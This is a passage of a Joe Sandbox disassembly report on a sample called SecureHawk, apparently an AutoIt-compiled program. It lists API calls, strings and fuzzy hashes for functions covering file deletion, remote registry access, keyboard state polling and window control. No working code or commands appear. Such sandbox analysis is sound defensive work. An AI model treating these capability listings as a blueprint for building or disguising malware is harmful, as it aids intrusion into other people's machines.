                                  • _wcscat.LIBCMT ref: 00359682
                                  • __wsplitpath.LIBCMT ref: 003596A7
                                  • _wcscat.LIBCMT ref: 003596BD
                                  • _wcscat.LIBCMT ref: 003596D0
                                    • Part of subcall function 003593CD: _memmove.LIBCMT ref: 00359406
                                    • Part of subcall function 003593CD: _memmove.LIBCMT ref: 00359415
                                  • _wcscmp.LIBCMT ref: 00359617
                                    • Part of subcall function 00359B5E: _wcscmp.LIBCMT ref: 00359C4E
                                    • Part of subcall function 00359B5E: _wcscmp.LIBCMT ref: 00359C61
                                  • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0035987A
                                  • _wcsncpy.LIBCMT ref: 003598ED
                                  • DeleteFileW.KERNEL32(?,?), ref: 00359923
                                  • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00359939
                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0035994A
                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0035995C
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                  • String ID:
                                  • API String ID: 1500180987-0
                                  • Opcode ID: 792875174e1a5236243e42c2063dcd20b32ed8405c6879e84cf59cd49a9926d9
                                  • Instruction ID: 1c02c7abe7c6e346f6a436e295e2dc6613bc3b25800edd89a7bf080301f94f53
                                  • Opcode Fuzzy Hash: 792875174e1a5236243e42c2063dcd20b32ed8405c6879e84cf59cd49a9926d9
                                  • Instruction Fuzzy Hash: EFC11DB1900119AADF16DF95CC85EDEB7BDEF49310F0040AAFA09E7151EB709A888F65
                                  APIs
                                  • _memset.LIBCMT ref: 00305BF1
                                  • GetMenuItemCount.USER32(003B6890), ref: 00340DFB
                                  • GetMenuItemCount.USER32(003B6890), ref: 00340EAB
                                  • GetCursorPos.USER32(?), ref: 00340EEF
                                  • SetForegroundWindow.USER32(00000000), ref: 00340EF8
                                  • TrackPopupMenuEx.USER32(003B6890,00000000,?,00000000,00000000,00000000), ref: 00340F0B
                                  • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00340F17
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                  • String ID:
                                  • API String ID: 2751501086-0
                                  • Opcode ID: df89676bc565011bf8c7d789b886e4e2e7d0a4e680595933dff251b5fd2ddde9
                                  • Instruction ID: 1ee3bce3749c6dae7c694ca4ceebb4bbed50a6560a3cd89c180d7555ed568fc1
                                  • Opcode Fuzzy Hash: df89676bc565011bf8c7d789b886e4e2e7d0a4e680595933dff251b5fd2ddde9
                                  • Instruction Fuzzy Hash: 6971D230605705BEFB2A9B54CC45FAABFA8FF06324F100216F6246A1E1C7717864DF94
                                  APIs
                                  • CharLowerBuffW.USER32(?,?,00380980), ref: 0035ADBB
                                  • GetDriveTypeW.KERNEL32(00000061,003A9970,00000061), ref: 0035AE85
                                  • _wcscpy.LIBCMT ref: 0035AEAF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: BuffCharDriveLowerType_wcscpy
                                  • String ID: L,8$all$cdrom$fixed$network$ramdisk$removable$unknown
                                  • API String ID: 2820617543-1415673726
                                  • Opcode ID: 43f4bbbaca1a393c637e04df8c28b64774b7e0d01bc33518c23cb8f5c4443814
                                  • Instruction ID: 977b120c3f25bbe46b053d482302b69da3653d79cb9bd913287a8163a1134b3b
                                  • Opcode Fuzzy Hash: 43f4bbbaca1a393c637e04df8c28b64774b7e0d01bc33518c23cb8f5c4443814
                                  • Instruction Fuzzy Hash: AB51C4301143019BC31AEF14C892EABB7A9FF85341F50492DF9965B2A2DBB0DD49CB93
                                  APIs
                                    • Part of subcall function 00301821: _memmove.LIBCMT ref: 0030185B
                                  • _memset.LIBCMT ref: 0034826C
                                  • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 003482A1
                                  • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 003482BD
                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 003482D9
                                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00348303
                                  • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0034832B
                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00348336
                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0034833B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                  • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                  • API String ID: 1411258926-22481851
                                  • Opcode ID: e4ac24dcd2fb985f68c1c24417407c02e551e1b00714fc895134fa2454a429c4
                                  • Instruction ID: b0661fd3262bf503b369a7e915448fd09ddd30d917fc52046ab8271a6ef8d32b
                                  • Opcode Fuzzy Hash: e4ac24dcd2fb985f68c1c24417407c02e551e1b00714fc895134fa2454a429c4
                                  • Instruction Fuzzy Hash: BF411976C1122CABDF16EFA4DC959EEB7B8FF04740F044569E801BA1A1DB70AD04CB90
                                  APIs
                                  • CharUpperBuffW.USER32(?,?,?,?,?,?,?,003701D5,?,?), ref: 00371259
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: BuffCharUpper
                                  • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                  • API String ID: 3964851224-909552448
                                  • Opcode ID: bf9c8dbffe86434071717187b5119e16c59677f0fe56f327df0b2a1a7e0889bf
                                  • Instruction ID: 405ee3171cd377894b98ee2427cda42a68e756957ff72937eeddb3ae8b9a7c80
                                  • Opcode Fuzzy Hash: bf9c8dbffe86434071717187b5119e16c59677f0fe56f327df0b2a1a7e0889bf
                                  • Instruction Fuzzy Hash: 64418E3A1102068BDF2AEF14D8519EE3729FF5A304F408514FC5A4F692DBB89D99CBA1
                                  APIs
                                    • Part of subcall function 00301821: _memmove.LIBCMT ref: 0030185B
                                    • Part of subcall function 0030153B: _memmove.LIBCMT ref: 003015C4
                                  • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00355758
                                  • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0035576E
                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0035577F
                                  • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00355791
                                  • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 003557A2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: SendString$_memmove
                                  • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                  • API String ID: 2279737902-1007645807
                                  • Opcode ID: 549c533d3ca3a797db602e9270ef0b93088cd23a503ac3a7017edc85748c820c
                                  • Instruction ID: 9626ebe141e1ae122934960f834c2720bbd3b8fab327a649e923b22b37899f4d
                                  • Opcode Fuzzy Hash: 549c533d3ca3a797db602e9270ef0b93088cd23a503ac3a7017edc85748c820c
                                  • Instruction Fuzzy Hash: F7119470A5111979DB22A761DC6AEFFBB7CEFD6B50F00042AF811AA0E1DE612D04C9B0
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                  • String ID: 0.0.0.0
                                  • API String ID: 208665112-3771769585
                                  • Opcode ID: 61360c025cc5791d0429cdb7e0659d3737fac3f315c744ceec903845a195e29b
                                  • Instruction ID: f588fa8571434ad820fe9fdbe3a6a6c5463acdb9e5e7f3df0bd341354b016a8a
                                  • Opcode Fuzzy Hash: 61360c025cc5791d0429cdb7e0659d3737fac3f315c744ceec903845a195e29b
                                  • Instruction Fuzzy Hash: DB11E732904208ABDB6FAB60DC46FDB77BCDF44715F0501A6F4459A0A1EFB0D9C98B91
                                  APIs
                                  • timeGetTime.WINMM ref: 003553A2
                                    • Part of subcall function 0031074E: timeGetTime.WINMM(?,00000002,002FC22C), ref: 00310752
                                  • Sleep.KERNEL32(0000000A), ref: 003553CE
                                  • EnumThreadWindows.USER32(?,Function_00065350,00000000), ref: 003553F2
                                  • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00355414
                                  • SetActiveWindow.USER32 ref: 00355433
                                  • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00355441
                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00355460
                                  • Sleep.KERNEL32(000000FA), ref: 0035546B
                                  • IsWindow.USER32 ref: 00355477
                                  • EndDialog.USER32(00000000), ref: 00355488
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                  • String ID: BUTTON
                                  • API String ID: 1194449130-3405671355
                                  • Opcode ID: e0a03a8d9bf1c8a6e59e0b775a1098513479fbb1a8665730cc7adaf4701e0403
                                  • Instruction ID: 5a2db19cf2034211ebb15eda5c763ec9908d511eb23b34e3ef68284703c22261
                                  • Opcode Fuzzy Hash: e0a03a8d9bf1c8a6e59e0b775a1098513479fbb1a8665730cc7adaf4701e0403
                                  • Instruction Fuzzy Hash: 2B2126B4208708AFE7575B20ECD9F253B6DEB8634BF141559FA05815B1DBB06C588B22
                                  APIs
                                    • Part of subcall function 002F4D37: __itow.LIBCMT ref: 002F4D62
                                    • Part of subcall function 002F4D37: __swprintf.LIBCMT ref: 002F4DAC
                                  • CoInitialize.OLE32(00000000), ref: 0035DA9A
                                  • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0035DB2D
                                  • SHGetDesktopFolder.SHELL32(?), ref: 0035DB41
                                  • CoCreateInstance.OLE32(00383D4C,00000000,00000001,003A9BEC,?), ref: 0035DB8D
                                  • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0035DBFC
                                  • CoTaskMemFree.OLE32(?,?), ref: 0035DC54
                                  • _memset.LIBCMT ref: 0035DC91
                                  • SHBrowseForFolderW.SHELL32(?), ref: 0035DCCD
                                  • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0035DCF0
                                  • CoTaskMemFree.OLE32(00000000), ref: 0035DCF7
                                  • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0035DD2E
                                  • CoUninitialize.OLE32(00000001,00000000), ref: 0035DD30
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                  • String ID:
                                  • API String ID: 1246142700-0
                                  • Opcode ID: 0e10c9819fabe2d63f5ac68c8cd09a00a6511b9e620878cc892df9fa4c9683a3
                                  • Instruction ID: a7b65738354f7f7ce5e2d4e2edfbd12da2b3246ea864385d987d3ebcb5ee84d8
                                  • Opcode Fuzzy Hash: 0e10c9819fabe2d63f5ac68c8cd09a00a6511b9e620878cc892df9fa4c9683a3
                                  • Instruction Fuzzy Hash: 25B1FA75A00209AFDB15DFA4C885DAEBBF9EF48305F1180A9E905EB261DB30ED45CB50
                                  APIs
                                  • GetKeyboardState.USER32(?), ref: 00350702
                                  • SetKeyboardState.USER32(?), ref: 0035076D
                                  • GetAsyncKeyState.USER32(000000A0), ref: 0035078D
                                  • GetKeyState.USER32(000000A0), ref: 003507A4
                                  • GetAsyncKeyState.USER32(000000A1), ref: 003507D3
                                  • GetKeyState.USER32(000000A1), ref: 003507E4
                                  • GetAsyncKeyState.USER32(00000011), ref: 00350810
                                  • GetKeyState.USER32(00000011), ref: 0035081E
                                  • GetAsyncKeyState.USER32(00000012), ref: 00350847
                                  • GetKeyState.USER32(00000012), ref: 00350855
                                  • GetAsyncKeyState.USER32(0000005B), ref: 0035087E
                                  • GetKeyState.USER32(0000005B), ref: 0035088C
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: State$Async$Keyboard
                                  • String ID:
                                  • API String ID: 541375521-0
                                  • Opcode ID: 73371e76882da4a05cffa2d4eeef045d2f81635e0b0d22dbe364e8b4fe201637
                                  • Instruction ID: db813b895a2015761aec521dc73512c5849d708bbfd3913fbabd42dbc9544bc9
                                  • Opcode Fuzzy Hash: 73371e76882da4a05cffa2d4eeef045d2f81635e0b0d22dbe364e8b4fe201637
                                  • Instruction Fuzzy Hash: C051E93090478829FB3BEBB08411FABAFB49F01341F09459DDDC65B1E3DA55AA4CCBA1
                                  APIs
                                  • GetDlgItem.USER32(?,00000001), ref: 0034CBFF
                                  • GetWindowRect.USER32(00000000,?), ref: 0034CC11
                                  • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0034CC6F
                                  • GetDlgItem.USER32(?,00000002), ref: 0034CC7A
                                  • GetWindowRect.USER32(00000000,?), ref: 0034CC8C
                                  • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0034CCE0
                                  • GetDlgItem.USER32(?,000003E9), ref: 0034CCEE
                                  • GetWindowRect.USER32(00000000,?), ref: 0034CCFF
                                  • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0034CD42
                                  • GetDlgItem.USER32(?,000003EA), ref: 0034CD50
                                  • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0034CD6D
                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 0034CD7A
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Window$ItemMoveRect$Invalidate
                                  • String ID:
                                  • API String ID: 3096461208-0
                                  • Opcode ID: 7e5cd445220a32f30c6ae98fd81b1d5e85eeba217b97db6910e59c3c5958c3be
                                  • Instruction ID: 75e205efda56fbf53e2b1ce7f0fc695648c41d37133cb6d3d42a01b4540ce526
                                  • Opcode Fuzzy Hash: 7e5cd445220a32f30c6ae98fd81b1d5e85eeba217b97db6910e59c3c5958c3be
                                  • Instruction Fuzzy Hash: ED514F71B10205AFDB59CFA8DD89AAEBBBAEF88310F14816DF516D7290D770AD048B50
                                  APIs
                                    • Part of subcall function 002F29AB: GetWindowLongW.USER32(?,000000EB), ref: 002F29BC
                                  • GetSysColor.USER32(0000000F), ref: 002F25AF
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: ColorLongWindow
                                  • String ID:
                                  • API String ID: 259745315-0
                                  • Opcode ID: e86091f8841a9ab87d59254e0f93408e147846668e1143fec29f820f64b183b1
                                  • Instruction ID: d1237bff7b3951c0658d06e3fc554e5a56c6f9fd7070132d4f36bc8a21117924
                                  • Opcode Fuzzy Hash: e86091f8841a9ab87d59254e0f93408e147846668e1143fec29f820f64b183b1
                                  • Instruction Fuzzy Hash: 8A41C431010214DBDB269F28DC89BB97B69EB07774F1542A1FE65CA1E2C7308C59DB21
                                  APIs
                                    • Part of subcall function 00310AB6: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00302A3E,?,00008000), ref: 00310AD2
                                    • Part of subcall function 003101AF: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00302A58,?,00008000), ref: 003101CF
                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00302ADF
                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00302C2C
                                    • Part of subcall function 00303EBE: _wcscpy.LIBCMT ref: 00303EF6
                                    • Part of subcall function 0031379F: _iswctype.LIBCMT ref: 003137A7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                  • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                  • API String ID: 537147316-3738523708
                                  • Opcode ID: 8b34494ca443972c4c3c1704e9cfb73a721d0c64162cac74c0798a3ea5fe19d2
                                  • Instruction ID: 520a3be09dcf48bd02f7a5d9ce3fb727ae44bb6c58b637fa8682f712b59c7d17
                                  • Opcode Fuzzy Hash: 8b34494ca443972c4c3c1704e9cfb73a721d0c64162cac74c0798a3ea5fe19d2
                                  • Instruction Fuzzy Hash: 7E02B4705093419FC72AEF24C891AAFBBE5FF89314F44491DF5859B2A1DB30D949CB42
                                  APIs
                                    • Part of subcall function 002F29E2: GetWindowLongW.USER32(?,000000EB), ref: 002F29F3
                                    • Part of subcall function 002F2714: GetCursorPos.USER32(?), ref: 002F2727
                                    • Part of subcall function 002F2714: ScreenToClient.USER32(003B67B0,?), ref: 002F2744
                                    • Part of subcall function 002F2714: GetAsyncKeyState.USER32(00000001), ref: 002F2769
                                    • Part of subcall function 002F2714: GetAsyncKeyState.USER32(00000002), ref: 002F2777
                                  • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 0037C417
                                  • ImageList_EndDrag.COMCTL32 ref: 0037C41D
                                  • ReleaseCapture.USER32 ref: 0037C423
                                  • SetWindowTextW.USER32(?,00000000), ref: 0037C4CD
                                  • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0037C4E0
                                  • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 0037C5C2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                  • String ID: @GUI_DRAGFILE$@GUI_DROPID$pr;$pr;
                                  • API String ID: 1924731296-2847593548
                                  • Opcode ID: 7986e492ed8041b30cad6f3b76169c6fa6cf1452d69940534186ace65d790774
                                  • Instruction ID: c121be4c8273d7a1952e1d5543c4e261a551f06a400e5d685cb59e726b3d4b14
                                  • Opcode Fuzzy Hash: 7986e492ed8041b30cad6f3b76169c6fa6cf1452d69940534186ace65d790774
                                  • Instruction Fuzzy Hash: 6E51BE71204304AFD716EF10CC96FAA7BE5EF84314F00861DF6598B2E2CB74A958CB52
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
